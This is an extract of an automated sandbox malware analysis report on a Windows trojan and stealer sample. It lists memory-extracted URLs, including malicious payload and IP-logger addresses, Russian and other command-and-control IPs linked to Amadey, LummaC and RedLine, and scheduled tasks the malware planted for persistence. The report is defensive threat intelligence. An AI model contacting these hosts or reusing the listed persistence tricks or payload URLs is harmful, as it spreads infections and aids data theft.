https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf	svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688894963.000001496F510000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C95000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C74000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/ppsecure/DeviceQuery.srf	svchost.exe, 00000011.00000003.1689140457.000001496F540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791355853.000001496EC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689166047.000001496F563000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id7LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://65.21.175.0/b13597c85f807692/vcruntime140.dllka	aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003057000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id11LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org	svchost.exe, 00000011.00000002.3791446115.000001496ECA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id9On	RegAsm.exe, 0000000D.00000002.3821279083.0000000002B94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3.o	svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13Response	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002BF6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.000000000297A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1940927772.000001496F581000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1941054724.000001496F507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1777703648.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1844385189.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1835684843.000001496ECDA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760094754.000001496F574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1705292405.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://65.21.175.0/b13597c85f807692/nss3.dllal	aspnet_regiis.exe, 00000036.00000002.2125675597.0000000003071000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://signup.live.com/signup.aspx	svchost.exe, 00000011.00000003.1689088530.000001496F53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F52C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80601	svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1689480355.000001496F556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80600	svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80603	svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id23LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-http://Passport.NET/STS09/xmldsig#ripledes-c	svchost.exe, 00000011.00000003.1941077457.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1882829080.000001496F578000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1950563801.000001496F579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2215413206.000001496F57A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id4ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605	svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80604	svchost.exe, 00000011.00000003.1688787695.000001496F529000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1688947560.000001496F552000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.	aspnet_regiis.exe, 00000036.00000002.2142722347.00000000232DD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.00000000031A4000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id16ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id19ResponseD	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002D7F000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.live.com/inlinesignup.aspx?iww=1&id=80605amp;id=806	svchost.exe, 00000011.00000002.3791446115.000001496EC5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/spnego	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc	1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794919953.000001496F588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794733578.000001496F55F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.co/1lLub%	1Vkf7silOj.exe, 00000001.00000002.1597298583.0000000005E3E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id12LR	RegAsm.exe, 0000000D.00000002.3821279083.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002F38000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DAE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002EE9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002FE3000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.116	unknown	Russian Federation	50916	NADYMSS-ASRU	false
94.228.166.74	unknown	Russian Federation	48467	PRANET-ASRU	false
185.215.113.67	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.172.128.33	unknown	Russian Federation	50916	NADYMSS-ASRU	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
185.199.111.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false
31.31.196.208	moreapp4you.online	Russian Federation	197695	AS-REGRU	false
67.199.248.11	bit.ly	United States	396982	GOOGLE-PRIVATE-CLOUDUS	true
43.153.49.49	unknown	Japan	4249	LILLY-ASUS	false
65.21.175.0	unknown	United States	199592	CP-ASDE	true
140.82.121.3	github.com	United States	36459	GITHUBUS	false
4.184.236.127	unknown	United States	3356	LEVEL3US	false
54.67.42.145	pixel.com	United States	16509	AMAZON-02US	false
172.67.167.249	iplogger.co	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
77.91.77.81	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
103.28.36.182	biancolevrin.com	Viet Nam	131353	NHANHOA-AS-VNNhanHoaSoftwarecompanyVN	false

Private

IP
192.168.2.7
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1463420
Start date and time:	2024-06-27 05:57:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1Vkf7silOj.exe renamed because original name is a hash value
Original Sample Name:	cd581d68ed550455444ee6e099c44266.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@106/85@21/19
EGA Information:	Successful, ratio: 62.5%
HCA Information:	Successful, ratio: 53% Number of executed functions: 118 Number of non-executed functions: 159
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 40.119.148.38, 216.58.206.35, 142.250.185.78, 64.233.167.84, 199.232.214.172, 34.104.35.123, 192.229.221.95, 23.211.8.90, 184.28.90.27, 40.126.31.73, 40.126.31.69, 20.190.159.64, 40.126.31.67, 20.190.159.68, 20.190.159.4, 20.190.159.75, 40.126.31.71, 20.42.73.29, 52.168.117.173, 52.182.143.212
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, movlat.com, slscr.update.microsoft.com, twc.trafficmanager.net, clientservices.googleapis.com, pool.hashvault.pro, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, depositybounceddwk.xyz, exertcreatedadnndjw.xyz, slammyslideplanntywks.xyz, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, bingowin.bet, panameradovkews.xyz, proffyrobharborye.xyz, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, aplointexhausdh.xyz, o7labs.top, compilecoppydkewsw.xyz, umwatson.events.data.microsoft.com, clients.l.google.com, ma
Execution Graph export aborted for target 6.exe, PID 7776 because there are no executed function
Execution Graph export aborted for target 7.exe, PID 7884 because it is empty
Execution Graph export aborted for target axplong.exe, PID 8088 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:39:49	API Interceptor	3x Sleep call for process: svchost.exe modified
01:39:55	API Interceptor	1x Sleep call for process: 6.exe modified
01:40:04	API Interceptor	801926x Sleep call for process: axplong.exe modified
01:40:12	API Interceptor	42080x Sleep call for process: Hkbsse.exe modified
01:40:14	API Interceptor	42x Sleep call for process: powershell.exe modified
01:40:31	API Interceptor	2x Sleep call for process: WerFault.exe modified
01:40:38	API Interceptor	63294x Sleep call for process: svhosts.exe modified
01:40:44	API Interceptor	12x Sleep call for process: 123.exe modified
07:40:00	Task Scheduler	Run new task: axplong path: C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe
07:40:12	Task Scheduler	Run new task: Hkbsse path: C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
07:40:14	Task Scheduler	Run new task: CCleaner path: "C:\Program Files\Google\Chrome\Application\chrome.exe" s>http://starjod.xyz/Website.php
07:40:14	Task Scheduler	Run new task: Updater path: "C:\Program Files\Google\Chrome\Application\chrome.exe" s>http://starjod.xyz/Website.php
07:40:32	Task Scheduler	Run new task: Cleaner path: C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe
07:40:55	Task Scheduler	Run new task: Firefox Default Browser Agent 8E839A582AA04455 path: C:\Users\user\AppData\Roaming\wdfjfgh
23:58:24	API Interceptor	89x Sleep call for process: 1Vkf7silOj.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.116	hsRju5CPK2.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT	Browse	185.172.128.116/Mb3GvQs8/index.php
	mCTacyNuyM.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116/Mb3GvQs8/index.php
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	185.172.128.116/Mb3GvQs8/index.php
	0DHrPD3miS.exe	Get hash	malicious	Amadey	Browse	185.172.128.116/Mb3GvQs8/index.php
94.228.166.74	K3wj3nqr6c.exe	Get hash	malicious	Amadey	Browse	o7labs.top/online/support/index.php
